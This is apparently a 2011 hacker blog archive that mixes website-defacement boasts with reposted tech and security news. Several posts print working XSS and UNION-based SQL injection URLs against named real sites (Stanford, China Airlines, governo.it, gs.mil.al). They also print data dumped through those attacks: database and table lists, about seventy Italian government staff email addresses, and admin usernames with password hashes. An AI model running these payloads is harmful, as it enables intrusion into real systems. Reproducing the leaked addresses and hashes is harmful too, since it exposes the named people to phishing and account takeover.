Recent Post

Thursday, June 30, 2011

2000 ( new ) WebSites HaCkeD By The 077 ( Hamdi HAcKer ) Tunisian HaCker




2000 ( new ) WebSites HaCkeD By The 077 ( Hamdi HAcKer ) Tunisian HaCker
Zone - H 


http://www.zone-h.com/archive/notifier=The%20077

























VIRUS STOPPER FOUNDATION [VSF]

STOP DOING BUSINESS WITH VIRUS !

You can’t put a price on protection. So we didn’t. Seriously great antivirus protection that’s seriously free. Download high-quality antivirus protection for your home PC-for free* Under Construction.

VIRUS STOPPER FOUNDATION is a not-for-profit, non-governmental organization started to awareness on 5 important things that was eliminating by the people in India. By philanthropists and some professionals led by Mr.G.Vimal Kumar. VIRUS STOPPER Foundation was started by a group of like-minded and concerned IT Professionals and Non-IT professionals committed to releasing the reach of the public. Realized the Scarcity, Deficiency of IT Security in India, taken a Challenging Task and Promised to My Mother Land – INDIA - Virus Stopper Anti Virus Software Research & Development.

VIRUS STOPPER Foundation (VSF) comprises 5 core groups that carry out the different activities of the foundation. These groups are:

1. Anti Virus Software Research & Development - Namely " Virus Stopper ".2. Anti Pollution & Global Warming, Stress and Strain of Human Pressures,
3. Anti Traffic Congestions, Road Safety,
4. Anti HIV/AIDS, Dengue Fever, Typhoid Fever, Malarial Fever, Chicken Guinea, Viral Infections,
5. Anti Corruption Registered Member in (ACRN), Blow your Whistle.

Vision, Mission, Objectives and Functions: Vision:
Proactive Contribution in Securing India’s cyber space
Mission:

To enhance the security of India's Communications and Information Infrastructure through reactive and proactive action and effective collaboration with cyber users and industry.
Objectives:
• Preventing cyber attacks against the country’s cyber space
• Responding to cyber attacks and minimizing damage and recovery time
• Reducing ‘national vulnerability to cyber attacks
• Enhancing security awareness among common citizensFunctions:
In the Information Technology (Amendment) Act 2008,
• Collection, analysis and dissemination of information on cyber incidents
• Forecast and alerts of cyber security incidents Results
• Emergency measures for handling cyber security incidents
• Coordination of cyber incident response activities
• Issue guidelines, advisories, vulnerability notes and whitepapers relating to information security practices, procedures,
prevention, response and reporting of cyber incidents
• Such other functions relating to cyber security as may be prescribed.


Aims of VSF TEAM

Reducing national vulnerability to cyber attack
Issuance of security alerts on latest threats and vulnerabilities
Enhancing security awareness among common citizens
Publicize the security site for common citizen - virusstopper.org

Preventive Functions of VSF TEAM

Preventing cyber attacks against the country’s cyber space
Improving the security posture of organisations and cyber users and enhancement in the ability of IT systems to resist cyber attacks
Conducting Security audits of critical sector organisation
Conducting cyber security mock drills at national level and participation in international drill.

Awareness/Training by VSF TEAM

Number of topics covered for awareness / trainings
The training programmes conducted in different relevant areas of cyber security for targeted audience to enhance their
awareness for threats to different systems and suitable counter measures to prevent the attacks and reduce the risk.
Improvement of the security of information and communications infrastructure and effective cyber incident resolution

PROOF VSF IS  REGISTERD

 http://i55.tinypic.com/egpjlt.jpg

Tuesday, June 28, 2011

Sky Lab China Hacked by Minhal


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLb9xeDsV94b2KBzqk1jVVg10IDYQ2_X8MSW2VmRIL02RDPdk8KdiMuasgo0BHLFaDQVeWUVWOpyQhp7arTaZBkcUC1zJ1KZZuEA5ykdn9ibqCygnooFV6_Om_WdaeWoCzopf55Ys86qI/s640/--%253D%253D%255B%255B+Hacked+By+Minhal+%255D%255D%253D%253D--.png

Sky Lab China Hacked by Minhal

Hacked website :-
http://skylab.mbaedu.cn/
Mirror :- http://zone-hc.com/archive/mirror/1cf6140_skylab.mbaedu.cn.html

Mobile Social Networking Is Way More Popular Than Anyone Thought


ComScore has come out with a set of data that will probably surprise you. The company found nearly 1 in 5 smartphone owners access check-in services via their mobile device. Now, lets do a bit of math here. According to an earlier study by Nielsen, US would approximately have 142.8 million total smartphone users by 2011 and 20% of that roughly accounts to about 30 million users. That’s a huge market for companies like Foursquare and Facebook and remember, we haven’t even added users from the rest of the world where growth is faster than that in US.

ComScore’s study found that 16.7 million U.S. mobile subscribers used location-based “check-in” services on their phones in March 2011, representing 7.1 percent of the entire mobile population. 12.7 million check-in users did so on a smartphone, representing 17.6 percent of the smartphone population. The study also found that check-in service users showed a high propensity for mobile media usage, including accessing retail sites and shopping guides, and displayed other characteristics of early adopters, including a stronger likelihood of owning a tablet device and accessing tech news, when compared to the average smartphone user.

“Although still in their relative infancy, location-based mobile check-in services are seeing rather impressive adoption among smartphone users,” said Mark Donovan, comScore senior vice president of mobile. “The ability to interact with consumers on this micro-local level through special offers, deals and other incentives provides brands with the real-time opportunity to engage consumers through their mobile device.”

So Who’s Using It?

The age group of 18-34 Year Olds Account for Nearly 60 Percent of Check-In Service Users. The services include Facebook Places, Foursquare and Gowalla which had heavy skews toward 18-24 year olds (26.0 percent) and 25-34 year olds (32.5 percent) in relation to both the total mobile audience and the overall smartphone audience. They were more likely to be full-time students (23.3 percent) when compared with total mobile (14.6 percent) or overall smartphone users (16.5 percent). Nearly half (46.4 percent) of check-in users were employed full time, slightly less than the percentage of smartphone users who were employed full time (53.3 percent). Both check-in service and smartphone users were more likely to be employed full time than overall mobile users (38.9 percent).

Mobile Check-In Service Users Are Heavy Media Consumers

The study compared an average smartphone owner with owners who check-in. It found social networking check-in users were more likely to access mobile media across a majority of content categories. More than 95 percent of check-in service users used their mobile browser or applications. Nearly 62 percent accessed news. Check-in user behavior was also consistent with that of traditional early adopters, with 40.3 percent of users accessing tech news and 28.2 percent owning a media tablet, both significantly higher than average. Check-in service users also showed a high propensity for accessing retail-related destinations on their mobile devices. Nearly one-third of users accessed online retail sites on their mobiles, while one-fourth accessed shopping guides. Check-in service users were also more likely to be exposed to mobile advertising, with nearly 40 percent recalling seeing a web or app ad during the month, compared to just 27.5 percent of smartphone users.

Journey Of A Facebook Photo [Infographic]

Pixable has captured the journey of a Facebook photo right from the moment it is snapped to the point where it is drowned in the flood of facebook updates.

Pixable says, “The online photo chaos continues to grow with the number of Facebook photo uploads increasing every day. Well over six billion photos are uploaded to Facebook every month, and with more camera enabled smartphones out there, you can only imagine where we’re headed.”

Pixable facebook Journey Of A Facebook Photo [Infographic]

Speak To Search with Google Voice For Chrome

Google day by day improving its technology and continuously bringing latest innovation with-in their products and software to make life more easy and rapid. After the announcements of Google Nexus 4G and Search by Image facility, Google have rolled out a new service to its Chrome browser.


google-voice-search-chrome
The service is still under beta phase and soon you will be able to search you queries by voice on Google Chrome browser, as heard the service is supported to almost all version of Google’s English language search over next coming days. You could have glance of this new service below provide video.
It’s easy to search out loud. All you need is Google Chrome 11 or higher and a built-in or attached microphone. Just click the mic in the search bar and start talking.
via Google Voice Search



Stunning iPod Magic Deceptions by Marco Tempest [Video]



We have seen many magicians performing with their trick and impressing the audience, but when it comes to make a magic using technology its difficult to do so. Similarly we have found a clever magician who uses Technology as his theme to create magic tricks, illusions to astonish the audience.

ipod-touch-magic

This guy Magician Marco Tempest have recently completed his magic illusion using three Ipod touch devices, it looks that he have broken down the image to be displayed on three screen. Well its just perfectly done mind there is no camera tricks, this all goes fair just watch the video tutorial.

For more information about the creator and his magic tricks you can navigate to Marco Tempest website.

More Evidence Of Google’s Social Gaming Plans

It’s been over a year since the talks of Google launching its own Facebook killer began. Up until now nothing much has happened from the company. While, Google has made some progress in social media with plus one and social search, the real social networking site that could perhaps compete with Facebook is yet to be launched.
300px Google Appliance More Evidence Of Googles Social Gaming Plans
Social gaming was touted as an entry point of its social media efforts. A job posting by the company confirms this rumour as the company is perhaps planning to build a social gaming empire.
The requirement is for a Product manager for its Games division.
Rare opportunity to grow a brand-new business – Games at Google! We are looking for a strategic, technical and game-loving Product Manager to drive Google’s gaming strategy. You will design strategies for game distribution and discovery, player identity, game mechanics, and more. In addition to designing a great user experience and building out key partnerships, you will be significantly influencing Google’s social platform as you work directly with a critical set of early adopters, game developers. Interesting and impactful decisions involving social gaming, privacy, virality, business, and technical APIs await you and the strong, passionate team of gamers you will work with.
The company hopes the candidate can establish partnerships internally and externally to drive the growth of its games to compete with gaming studios like Zynga.

Facebook’s New Enforcement System Brings Down Several Apps

Facebook recently tweaked the algorithm that detects spammy applications. But something hasn’t gone down as expected as several genuine apps have been banned without any intimation to their respective owners.986497463 0e9981a205 m Facebooks New Enforcement System Brings Down Several Apps

According to Anthony Franco, co-founder of FriendCameo – a video chat on Facebook with over two million users, all of their users are receiving a 404 error when attempting to visit their application. And they have no way of reaching out to Facebook. On Hacker News he says,”Attempting to appeal to Facebook results in a generic email response instructing us to begin the application anew. Worst of all, deleting our application also deleted the photos our users took. We had a video chat application that allowed users to take pictures together with their friends. Over 1 million photo memories deleted by Facebook.”

In another case, developer of Grand Poker tells that the company spent huge amount of marketing dollars on adverts and product development. Furthermore, many of its paid customers demand for refunds or legal action. Apparantely, the company is feeling the pinch because Grand Poker happens to be the main source of revenue, and it is also funding other projects on facebook. The actions of Facebook might pretty much kill the company.

In yet another case, developer of Photo effect app says that three of their apps were banned even after following the TOS for app developers.

Developers are flooding online forums to vent their ire against lack of customer support on Facebook. Due to the volume of requests Facebook receives on a daily basis, it would probably take days if not months for apps to be reinstated. Upon contacting Facebook team, developers get an automated mail that states,

We’ve checked out the circumstances of your app’s removal, and we found that your app received strong negative feedback from users and their friends. Here are some types of feedback that our systems look for when users interact with apps: removing content generated by your app from the News Feed, labeling content by your app as ‘spam’, uninstalling or blocking your app, and not granting extended permissions requested by your app. These signals denote a poor user experience and amount to a violation of our Facebook Platform Principles, which is why your app was removed. Accordingly, we will not be able to restore your app. However, if you’d like to launch a new version of your app with a new app ID and canvas URL, please first make adjustments to ensure you’re providing a good user experience and meeting our policies.

According to a Facebook engineer who is working on the issue, Facebook has been getting a lot of user feedback recently, spiking significantly over the past week, on the amount of application spam people are seeing in their feeds and on their walls. The company has turned on a new enforcement system yesterday that took user feedback much more heavily into account. This resulted in a number of applications with high negative user feedback being disabled or having certain features disabled. In particular, many applications were disabled which posted to the walls of other users and had very high mark-as-spam numbers. And regarding poor feedback on apps for developers, the company says it is fixing the issue in its new Application Insights that will be launching over the next few weeks. The new dashboard will feature detailed information about both positive and negative engagement of the content your application generates.

Facebook has been under fire for pulling up apps and pages without intimating owners. The fact that the company uses bots to supervise content on the site makes matters worse. Also, the lack of proper customer support seem to the biggest pain in the ass for developers who are left with no option but to wait.

Monday, June 27, 2011

Multipule vulnerabilities Found in Standford University's website by Minhal Mehdi


Multipule vulnerabilities Found in Standford University's website by Minhal Mehdi

XSS:
http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

SQLI:
http://english.stanford.edu/index.php?news_id=309%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--

XSS Vulnerablity Found in China-airlines by Minhal Mehdi


XSS Vulnerablity Found in China-airlines by Minhal Mehdi


vlun link :- http://search.china-airlines.com/www/search.asp?p=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&o=4&v=root&r=2

Government of italy's website Database exposed by Minhal Mehdi


Government of italy's website Database exposed by Minhal Mehdi

Website :- http://governo.it

Vulnrable link :http://governo.it/Governo/ConsiglioMinistri/dettaglio.asp?d=60314&pg=1,2173,2887&pg_c=2'

Powered By: ASP.NET

Server Detail: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)

Server Name: WEB-VSQL1\INST1

Current DB: chigi_intranet

Database : MSSQL 2005


* [2] SQL Detail

# Databases List:
- chigi_intranet
- master
- tempdb
- model (LOCKED)
- msdb
- AAA (LOCKED)
- chigi_mag2006
- chigi_intranet
- chigi_developer
- sondaggidb (LOCKED)
- AffariRegionali_BO (LOCKED)

# Tables of 3 DB:

[+] chigi_intranet:
doc_tipi
qst_datipersonali
doc_target
doc_prov_tipi
eml_scrivi_a
doc_prov_aree
doc_monitoraggio_soggetto
eml_categoria
doc_monitoraggio_sede
doc_monitoraggio_organo
doc_monitoraggio_azione
doc_lingue
eml_autori_aree
doc_iter
doc_fonti
doc_dossier
doc_documenti_swap
doc_atti_tipi
doc_associatipi
Composizionenewsletter
eml_aree
Argomento
eml_registra_operazione
ana_amministratori_pubblici
qst_pianodiazione
web_webletter_log
pag_sezioni_pagine
pag_documenti_sezioni
faq_keyword
faq_faq_gruppi_keyword
doc_documenti_target
doc_documenti_monitoraggio
doc_documenti_links
doc_documenti_fonti
doc_documenti_dossier
doc_documenti_allegati
web_webletter_testo
pag_sezioni
int_interrogazioni
faq_form_richieste
faq_faq
faq_diritti_utenti
doc_monitoraggio_soggetto_prov_tipi
pag_autori_pagine
doc_monitoraggio_azione_prov_tipi
doc_fonti_tipi
doc_documenti
ana_amministratori_pubblici_mail
nwl_Newsletter
web_webletter
temp_monitoraggio
Results
pag_pagine
nwl_Notizianewsletter
nwl_Notizia_link
nwl_Notizia_argomento
nwl_Composizionenewsletter
nwl_Argomento
not_notizia_pub
not_notizia_link
not_notizia_argomento
not_notizia
not_immagini
log_ricerca
log_Domande
int_tipi_interrogazione
int_sedi
int_gruppi_parlamentari
ana_autori
gen_governi
faq_gruppi_keyword
faq_aree_tematiche
dtproperties
faq_aree
qst_semplificazione_proposte

[+] Master:
spt_server_info
spt_datatype_info
MSreplication_options
spt_datatype_info_ext
spt_provider_types
spt_fallback_usg
spt_fallback_dev
spt_fallback_db
spt_values
spt_monitor


[+] Msdb:
sysjobschedules
RTblIfaceMem
backupfile
syscategories
systargetservers
RTblWorkspaceItems
restorehistory
systargetservergroups
RTblDatabaseVersion
systargetservergroupmembers
sysalerts
RTblDTSProps
RTblVersionAdminInfo
restorefile
sysoperators
sysnotifications
RTblParameterDef
restorefilegroup
systaskids
syscachedcredentials
RTblIfaceHier
logmarkhistory
RTblNamedObj
sysdtscategories
sysdtspackages
RTblTypeInfo
sysdtspackagelog
RTblScriptDefs
RTblOLPProps
sysdtssteplog
RTblEnumerationDef
sysdtstasklog
RTblClassExtension
RTblSumInfo
RTblMDSProps
RTblEnumerationValueDef
RTblUMLProps
sysdbmaintplans
sysdbmaintplan_jobs
RTblUMXProps
sysdbmaintplan_databases
RTblSIMProps
sysdbmaintplan_history
RTblGENProps
RTblDTMProps
log_shipping_primaries
log_shipping_secondaries
RTblDBMProps
RTblEQMProps
log_shipping_monitor
mswebtasks
log_shipping_databases
log_shipping_plans
RTblVersions
log_shipping_plan_databases
log_shipping_plan_history
RTblDBXProps
RTblRelships
RTblSites
RTblProps
RTblRelshipProps
RTblPropDefs
RTblRelColDefs
RTblIfaceDefs
backupmediaset
sqlagent_info
RTblClassDefs
sysdownloadlist
backupmediafamily
sysjobhistory
sysjobs
RTblTFMProps
RTblRelshipDefs
backupset
sysjobservers
RTblTypeLibs
sysjobsteps



* [3] Users Found Information

The table "ana_autori" would seem the users table.
Search the columns:

aaut_alias
aaut_approva
aaut_cancella
aaut_cognome
aaut_consultazione
aaut_dipartimento
aaut_dossier
aaut_email
aaut_fonti
aaut_gestpagine
aaut_gestutenti
aaut_governi
aaut_id
aaut_logs
aaut_newsletter
aaut_nome
aaut_note
aaut_password
aaut_questiontime
aaut_rassegna
aaut_rep_amministratori
aaut_scrivia
aaut_sigla
aaut_tipi

Get data from "aaut_mail" and "aaut_password"

Result is:
a.bellino@governo.it
a.decaroli@palazzochigi.it
a.griffo@governo.it
a.messina@governo.it
a.milza@governo.it
b.alongi@governo.it
b.altomonte@governo.it
b.casini@governo.it
b.coppa@governo.it
b.pastorelli@governo.it
c.antonelli@governo.it
c.canato@governo.it
c.foglia@palazzochigi.it
c.nicolo@palazzochigi.it
c.zoffoli@governo.it
cips @ciaps.com
d.dellavecchia@governo.it
d.integlia@governo.it
d.pedercini@palazzochigi.it
didom@governo.it
documentazione.dagl@palazzochigi.it
e.grassi@governo.it
e.lombardo@governo.it
f.barazzoni@governo.it
f.casinelli@governo.it
f.montano@palazzochigi.it
f.salzano@governoit
fsi@palazzochigi.it
g.benigni@governo.it
g.cioeta@governo.it
g.delia@palazzochigi.it
g.pirrello@governo.it
i.madonna@governo.it
l.alfonso@governo.it
l.cusano@governo.it
l.debiase@palazzochigi.it
l.iannarilli@palazzochigi.it
l.loreto@palazzochigi.it
l.malatesta@governo.it
l.nencini@governo.it
l.pilozzi@governo.it
l.saccoccia@palazzochigi.it
m.baldi@governo.it
m.cobianchi@governo.it
m.didiodato@governo.it
m.divico@governo.it
m.lafalce@palazzochigi.it
m.lusini@palazzochigi.it
o.amari@palazzochigi.it
p.laurenzi@governo.it
p.sabatella@palazzochigi.it
p.sirocchi@governo.it
presi@gov.it
r.bonanni@governo.it
r.boschi@palazzochigi.it
r.carpino@governo.it
r.fronzuto@governo.it
r.gallucci@governo.it
r.rega@palazzochigi.it
redazione.web@palazzochigi.it
s.diplacido@governo.it
s.fantauzzi@governo.it
s.masini@governo.it
s.rossibrigante@palazzochigi.it
s.tarquini@governo.it
salaregia@palazzochigi.it
t.antonelli@governo.it
t.benini@governo.it
t.vannozzi@governo.it
uff@gov.it
urp@palazzochigi.it
v.caputo@palazzochigi.it
v.tretter@governo.it
webmaster@governo.it

gs.mil.al (Army Forces of Albania)'s Database Hacked by Minhal Mehdi

gs.mil.al (Army Forces of Albania)'s Database Hacked by Minhal Mehdi



vulnerablity :-

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,@@version,5,6--

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where%20table_schema=database()--

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,group_concat(Username,0x3a,Password),5,6+from+editor--

Host Information

Server = Apache/2.2.17 (EL)
Version = 5.1.52
Powered by = PHP/5.2.16
Attack Type = SQL Union Injection
Current User = gs-site-2007@localhost
Current Database = gs
Supports Union = yes
Union Columns = 6

Url| http://www.gs.mil.al/galeri_info.php?idr=&ida=1

Vuln: http://www.gs.mil.al/galeri_info.php?idr=&ida=1+and+1=0+ Union Select 1 ,2,3, UNHEX(HEX([visible])) ,5,6

Comment: --

Visible Column: 4

Hexed: True

Cookie:

Keyword:

Param:

Database:gs

information_schema
gs
test

Tables:editor
dokumente
downloadcat
editor
gallery
gallery_tema
gjera
gjuha
kontakte
kontakteweb
links
materiali
materiali_orig
menu_tree
nivelrubrike
rubrika

Columns: Table editor
EmriEditor
MbiemriEditor
EmailEditor
Username
Password
Aktive
Niveli
Rezerve

admin:c458ac81e291707ec50c8b9c362cdd63,
editor:fe01ce2a7fbac8fafaed7c982a04e229:demo
quark:fe01ce2a7fbac8fafaed7c982a04e229:demo

Hackers Are Targeting Facebook via spreading malware



Facebook accounts are becoming favorite targets of hackers. If your account has been hacked, you could be in good company considering Facebook founder Mark Zuckerberg and French President Sarkozy have also been victims. Actually, thousands -- maybe millions -- of Facebook pages have been hacked. The hackers then use the accounts to send out erroneous messages to "friends."
One of your friends seems to have sent you a video or awesome photo or link, and suggests you click on it. The computer screen tells you to log in again to see the video or photo or quiz. But as soon as you sign in, you are giving your information to a hacking site, which now has your screen name and password.You probably would be suspicious of a strange e-mail in your inbox, but when you believe you are getting a link from a friend on a social network, you might not be so cautious.

You have actually been caught by one of the most common forms of hacking called "phishing." Recently estimated 1.5 million Facebook accounts are listed for sale on a website discovered by Verisign's iDefense Labs. The names were sold for as much as $45 for accounts with more than 10 friends. They are considered a way of spreading malware rather than strictly for identity theft.

People who find out that their Facebook accounts have been hacked, should immediately reset their passwords. They should also send Facebook a message, which will allow the company to look into the situation further.

T-Mobile USA: We’re now carrying over a million unlocked iPhones



As AT&T tries to swallow up the American wing of the German telekom, many have wondered whether Apple would allow T-Mobile to carry the iPhone. Apple’s answer so far is a no*, but that hasn’t stopped T-Mobile customers from adopting iPhones. In huge numbers.

In a meeting with T-Mobile spokespeople today ahead of the NYC Pepcom event, I received word that there are actively over a million Apple iPhones currently on T-Mobile’s network. When asked for a breakdown, the spokesman said the majority were pre-iPhone 4 but that a significant amount of people had “taken the scissors” to their T-Mobile SIM cards. T-Mobile doesn’t currently offer a Micro-SIM solution for Apple’s iPhone 4 so people who want to use the iPhone 4 must modify their SIMs into MicroSIMs. Those using iPhone 4s also won’t receive T-Mobile’s 3G or 4G data speeds because of the radio differences between the networks.

*Apple started selling unlocked iPhone 4s in the US for the first time earlier this month.

When asked to elaborate further on Micro-SIMs, the spokesman told me they are in the works but there was no time frame for release. Why not wait until the deal with AT&T is over to make MicroSIMs? Perhaps we’ll have a little surprise come September.

When asked specifically about the possibility of a T-Mobile USA iPhone, T-Mobile said they have nothing to announce at this time.

F.B.I. Seizes Web Servers, Knocking Sites Offline


The F.B.I. seized Web servers in a raid on a data center early Tuesday, causing several Web sites, including those run by the New York publisher Curbed Network, to go offline.

The raid happened at 1:15 a.m. at a hosting facility in Reston, Va., used by DigitalOne, which is based in Switzerland, the company said. The F.B.I. did not immediately respond to a request for comment on the raid.

In an e-mail to one of its clients on Tuesday afternoon, DigitalOne’s chief executive, Sergej Ostroumow, said: “This problem is caused by the F.B.I., not our company. In the night F.B.I. has taken 3 enclosures with equipment plugged into them, possibly including your server — we cannot check it.”

Mr. Ostroumow said that the F.B.I. was only interested in one of the company’s clients but had taken servers used by “tens of clients.”

He wrote: “After F.B.I.’s unprofessional ‘work’ we can not restart our own servers, that’s why our Web site is offline and support doesn’t work.” The company’s staff had been working to solve the problem for the previous 15 hours, he said.

Mr. Ostroumow said in response to e-mailed questions that it was not clear if the issues would be resolved by Wednesday.

A government official who declined to be named said earlier in the day that the F.B.I. was actively investigating the Lulz Security group and any affiliated hackers. The official said the F.B.I. had teamed up with other agencies in this effort, including the Central Intelligence Agency and cybercrime bureaus in Europe.

Mr. Ostroumow declined to name the client targeted by the F.B.I. and said that he did not know why it had drawn their interest. It was also unclear why the agents took more servers with them than they sought, he said.

The sites of the Curbed Network, including popular blogs covering real estate, restaurants and other topics, were all unavailable Tuesday evening. Lockhart Steele, Curbed’s president, said his team realized that the company’s sites were down at around 3 a.m. and contacted DigitalOne. After initially declining to say what had happened, DigitalOne explained that the F.B.I. had raided the data center, Mr. Steele said.

“Our servers happened to be in with some naughty servers,” he said, adding that his sites were not the target of the raid. Curbed is working to get its sites back online, probably by Wednesday.

The raid also affected a server used by Instapaper, a popular service that saves articles for later reading. Marco Arment, Instapaper’s founder, said he lost contact with a server hosted by DigitalOne early on Tuesday. Instapaper’s Web site is still operating but has slowed somewhat. Mr. Arment said he had not heard from DigitalOne or law enforcement, and had no reason to believe that Instapaper was a target of the raid.

Pinboard, a bookmarking site, was operating on a backup server and some of its features were turned off, a post on its site said.

DigitalOne provided all necessary information to pinpoint the servers for a specific I.P. address, Mr. Ostroumow said. However, the agents took entire server racks, perhaps because they mistakenly thought that “one enclosure is = to one server,” he said in an e-mail.

DigitalOne had no employees on-site when the raid took place. The data center operator, from which DigitalOne leases space, passed along the information about the raid three hours after it started with the name of the agent and a phone number to call.

Before learning of the raid, Mr. Ostroumow, who is in Switzerland with the rest of his team, thought the problem was a technical glitch, he said.

Nick Bilton contributed reporting.

Google.Com is Expiring Soon !!

Just to update our readers with an interesting find here, Google.com is going to get expired pretty soon – yes, on September 14th this year.
Sure there is plenty of time left for Google to renew the domain name – but you might agree with me here that domain names of major brands are renewed for decades and not for year(s).
Moreover, snatching a domain from Google can be a wild dream for any web surfer, especially when they have plenty of trademarks and patents associated with the brand. But again, what Google is waiting for to renew it’s domain name?
check below:
google.com whois Google.Com is Expiring Soon!
Following is the list of popular domains with their respective expiry dates and once again Google takes a lead here, indeed.
  • Google.com – 14-09-2011
  • Yahoo.com – 19-01-2012
  • Myspace.com – 23-02-2013
  • Orkut.com – 08-12-2013
  • Gmail.com – 12-08-2014
  • Wikipedia.org – 13-01-2015
  • Microsoft.com – 03-05-2015
  • MSN.com – 04-06-2015
  • Facebook.com – 03-03-2020

Sunday, June 26, 2011

American Earth Search Communications Hacked By Minhal Mehdi

American Earth Search Communications Hacked By Minhal Mehdi

http://www.speakbindas.com/wp-content/uploads/2011/05/Minhal-Mehdi-copy.jpg



Hacked website :- http://app.earthsearch.us/

Mirror :- http://mirror.sec-t.net/defacements/?id=45423

74 % of online users fear hacking of social networking account: Study


Online users in the country today are more scared of their social networking account being hacked as compared to loss of personal data in the cyber world, a Microsoft India study said.

About 74 per cent of the respondents said they worry about hacking of their social networking account as opposed to loss of personal data, which accounted for just 16 per cent and credit card fraud (five per cent), the study said.

The survey was hosted on Microsoft India’s ‘Windows and Me’ Facebook page and received responses from over thousands of consumers, it said.

About 50 per cent of respondents said they spent close to five hours on the internet daily.

Connecting with people online emerged as the favourite activity, with 40 per cent people saying they spend this time on social networking sites.

Other key activities included research (with 35 per cent) and entertainment (22 per cent).

The study revealed that nearly one—fourth of the participants (over 23 per cent) said they have been victims of cyber attacks.

Of this, 67 per cent people said they had suffered loss of personal data, followed by 19 per cent users witnessing e—mail account hacking.

“The large number of cyber attacks has also led to people becoming more aware about online security threats and thus realising the need for online security and anti—virus solutions,” the study said.

While the study found that almost 90 per cent Indians have an anti—virus installed on their PC, however, majority of the users (62 per cent) felt their job is done once they install an anti—virus on their PC.

This reflects that the Indian consumers are still are not completely aware of the repercussions of cyber attacks, the study said.

“Consumers are becoming increasingly aware about security threats they are exposed to in the online environment and are looking for security solutions that work in the back—end and let them enjoy their online world without any worries or interruptions,” Microsoft India Director (Windows Client, Consumer and Online Business) Pankaj Ukey said.

Friday, June 24, 2011

Anonymous Hacker's website Hacked by Xx_DoGaN_xX

http://www.agnitum.com/images/securityinsight/hacker_back.jpg

Anonymous Hacker's website Hacked by Xx_DoGaN_xX | and hacker left a massege for Anonymous on website



The so-called group called Anonymous hackers may make sense for you .. The fears you have them, and they are up to our power, including Survivors of the war will not end until all of you have finished. You are condemned to defeat all the time! We are Turkish and byDaNG3R...& Xx_DoGaN_xX

Hacked website :- www.anoniymous.com

Mirror :- http://turk-h.org/defacement/view/384487/anoniymous.com

adsense.com.pk Hacked by ro0t_d3vil

Thursday, June 23, 2011

Google top search Hacked by Minhal Mehdi

Google top search Hacked by Minhal Mehdi
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRCeD2TljOJVK2TF4QbRTeXYkdQ50-Aijn8OpQpP7kBRXJZBB4qH2o-cUR8YAPlnU_CA-X7umG6Wd3L_lBF5zd0DoPkQ_RWpLcPNhVXM7cfvtRK_K-Fj7XIsudefyhWUi48NZGXWkX3kU/s1600/---%253D%253D%255B%255B+Hacked+By+Minhal+%2526+NoTty_rAJ+%255D%255D%253D%253D---.png


Hacked website:- http://www.googletopsearch.net/

Mirror :- http://mirror.sec-t.net/defacements/?id=44294

Wednesday, June 22, 2011

XSS Vulnerablity Found in MySQL.ru by Minhal Mehdi

XSS Vulnerablity Found in MySQL.ru by Minhal Mehdi

http://www.freeimagehosting.net/uploads/c532f1d68c.jpg


Vul website - http://www.mysql.ru/

Vuln Link - http://www.mysql.ru/search/?b=1&terms=%3Cscript%3Ealert%28123%29%3C/script%3E

Saturday, June 18, 2011

http://pakhackerz.com Hacked By ICA

Thursday, June 16, 2011

LulzSec Expose the 62,000+ emails user names /passwords

HACKERS NEWS OWNER [THN] 2nd website theevilhackerz.com had Hacked By Pak Leets

HACKERS NEWS OWNER [THN] 2nd website theevilhackerz.com had Hacked By Pak Leets


URL :-  http://www.theevilhackerz.com/
Mirror Link  :- http://k0-ka.in/attack/?id=15438

Wednesday, June 15, 2011

LulzSec Attacks the CIA website


The hacker group Lulz Security has claimed it has brought down the public-facing website of the US Central Intelligence Agency.

  They had also hack  Sony, Nintendo, the PBS, FBI affiliates.  LulzSec claimed on Wednesday its responsibility for hacking the website for the U.S. Central Intelligence Agency.

"Tango Down - cia.gov - for the lulz," the group tweeted at around 6 p.m., June 15 at http://twitter.com/#!/LulzSec/status/81115804636155906

Over the weekend, a portion of the Senate website was hacked, and the same website was targeted again on Wednesday. LulzSec was unable to access proprietary data due to a firewall, the Senate acknowledged today.

The hacker group tweeted an hour ago, "Lulz Security, where the entertainment is always at your expense, whether you realize it or not. Wrecking your infrastructures since 2011."

Its Twitter followers have swelled to nearly 160,000.

A CIA spokeswoman told the Associated Press that officials are investigating the reports. Such outages are often the result of DDoS, or distributed denial of service, attacks. The assaults generally require little skill to carry out.

THANKS TO [THN] THE HACKERS NEWS

Monday, June 13, 2011

US military creates fake online persons all over the internet

The US military awarded a contract for software to create 500 fake personas on social networks in order to secretly influence online debate in its favour, it has been reported.

US military Creates fake online persons !

 

The $2.76m contract was won by Ntrepid, a Californian firm, and called for an "online persona management service" that would enable 50 military spies to manage 10 fake identities each.
The personas should be "replete with background , history, supporting details, and cyber presences that are technically, culturally and geographacilly consistent", a US Central Command (Centcom) tender document said.
It added: "Individual applications will enable an operator to exercise a number of different online persons from the same workstation and without fear of being discovered by sophisticated adversaries.
"Personas must be able to appear to originate in nearly any part of the world and can interact through conventional online services and social media platforms."
The project would be based at MacDill Air Force base in Florida, The Guardian reported. The contract was first revealed by The Raw Story, a US news website. 
It also called for internet traffic from the project to be "mixed" with traffic from outside Centcom to provide "excellent cover and powerful deniability".
A Centcom spokesman however said the fake social media personas would not "address US audiences".
"The technology supports classified blogging activities on foreign-language websites to enable Centcom to counter violent extremist and enemy propaganda outside the US," said Commander Bill Speaks.
If used against US citizens such "sock-puppetry" techniques, as they are known online, would bring legal fire on the military.
The MoD meanwhile said it could find no evidence that British forces was involved in Operation Earnest Voice, a $200m anti-jihadism psychological operation, of which Centcom's "online persona management service" contract was thought to be part.

SQL Vulnerablity, found in http://mes.gov.in by crypton

SQL Vulnerablity,  found in http://mes.gov.in by Crypton 

Vulnerable Link:- http://mes.gov.in/tender.php?zone=1927'

SQL Vulnerablity, found in http://www.balochistanpolice.gov.pk by Crypton

Sunday, June 12, 2011

China-ebooks.com Hacked by Minhal & NoTty_rAJ

